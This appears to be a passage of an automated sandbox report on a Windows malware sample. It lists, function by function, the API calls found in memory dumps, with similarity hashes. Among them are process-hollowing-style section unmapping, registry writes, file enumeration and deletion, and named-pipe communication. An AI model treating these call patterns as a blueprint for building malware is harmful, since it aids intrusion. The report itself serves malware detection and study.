    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
